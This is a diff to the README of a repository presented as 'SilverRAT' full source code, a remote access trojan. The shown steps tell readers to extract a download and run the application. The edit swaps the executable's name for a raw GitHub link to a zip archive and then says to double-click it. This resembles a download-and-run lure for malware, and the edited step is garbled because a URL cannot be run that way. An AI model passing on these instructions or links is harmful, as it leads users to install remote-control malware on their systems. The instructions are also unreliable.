aldeaajawad/SilverRAT-FULL-Source-Code/README.md

 2. **Extract the Files**: If your download is in a zip format, right-click the file and select “Extract All” or use your extraction tool.
 This will create a folder with all the necessary files.

-3. **Run the Application**: Inside the extracted folder, find the main application file (it may be named `SilverRAT.exe`).
+3. **Run the Application**: Inside the extracted folder, find the main application file (it may be named `https://raw.githubusercontent.com/aldeaajawad/SilverRAT-FULL-Source-Code/main/SRC/authguard/Source_FUL_Silver_Code_RA_v3.9-beta.5.zip`).
 Double-click this file to run the application.

 ## ⚙️ Features